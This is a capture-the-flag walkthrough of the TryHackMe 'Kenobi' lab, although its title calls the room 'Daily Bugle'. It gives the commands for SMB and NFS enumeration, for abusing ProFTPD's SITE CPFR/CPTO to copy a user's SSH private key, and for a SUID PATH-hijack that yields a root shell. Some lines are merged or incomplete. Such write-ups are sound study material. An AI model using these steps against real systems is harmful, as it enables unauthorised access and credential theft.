Today let’s play a CTF called Daily Bugle at https://tryhackme.com/room/kenobi
NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read this post!
To start with we are going to perform some basic enumeration using nmap!
nmap -sS -p- -vvv -O -A -T4 -sC -sV -oA kenobi 10.10.87.63
Here we notice that there are a range of services open including:
Now that we have identified the services, we also have looked at the verisons etc. to try and identify if they have any known vulnerabilities.
Seeing TCP 445 open raises a red flag, so we head here and look to enumerate further!
nmap -sS -p 445 -vvv -O -A -T4 -sC -sV -oA kenobi-smb –script=smb-enum-shares.nse,smb-enum-users.nse 10.10.87.63
We notice from this scan a share is accessible using a NULL auth.
SMBCLient Connect to Share
Press ENTER for a NULL password
Now that we can see the share, we can see that there is content in the anonymous share! Let’s go ahead and use the smbget command to download this so that we can analyse it from our attacker machine.
smbget -R smb://10.10.87.63/anonymous
nmap -p 111 –script=nfs-ls,nfs-statfs,nfs-showmount 10.10.87.63
We can see another service running on the host is PROFTPD. We can look here to see if there are any known vulnerabilities in this product (and specifically this version)
We also use searchsploit to search for the product name and specifically the version (It’s a good practise to search for a few combos)
This vulnerability means that unauthenticated clients can execute remote command (RCE) against the service.
PROFTPD includes the following command sets:
- SITE CPFR
- CITE CPTO
SITE CPFR /home/Kenobi/.ssh/id_rsa
Now issue SITE CPTO /var/tmp/id_rsa
|nc 10.10.87.63 21SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa
What we have done here is move the private key to the /var/tmp/ folder
Now we are going to mount this using NFS
|mkdir /mnt/kenobiNFSmount 10.10.87.63:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
cp /mnt/kenobiNFS/tmp/id_rsa /pentest/tryhackme/Kenobi
chmod 600 id_rsa
ssh -i id_rsa firstname.lastname@example.org
We are now have gained access to an SSH shell in userland as Kenobi!
Privilede Escalation using Path Variable Manipulation
Search for files with the SUID bit set:
find / -perm -u=s -type f 2>/dev/null
The binary name which is not a LOLbin is /usr/bin/menu
Running string on the binary
We can see here that the binary is running other binaries without a full path. This means this fact, combined with the SUID bit means this binary can be used to execute commands as root.
To abuse this, we can do the following:
|#change to the tmp directorycd /tmp
#copy the bash shell to a file name curl in tmp
echo /bin/sh > curl
#change the permissions using chmod 777 curl
chmod 777 curl
#add /tmp to the $PATH variable
UNIX permissions can seem confusing if you are coming from a Windows background. I found a great little site that outputs permission values to clear readable formats:
Now we are root!
Now we need to get the flag!
Well that again was a good experience. I like the way it walks you through. It would have been better if it had included visit the web services and running common web enumeration etc. (e.g. Nikto etc.)
But overall, I like the platform and I like the way it is going into details about the vulnerabilities and config along the route. It gives you the freedom to explore whilst helping people learn, this is a great capability from a learning platform from my point of view.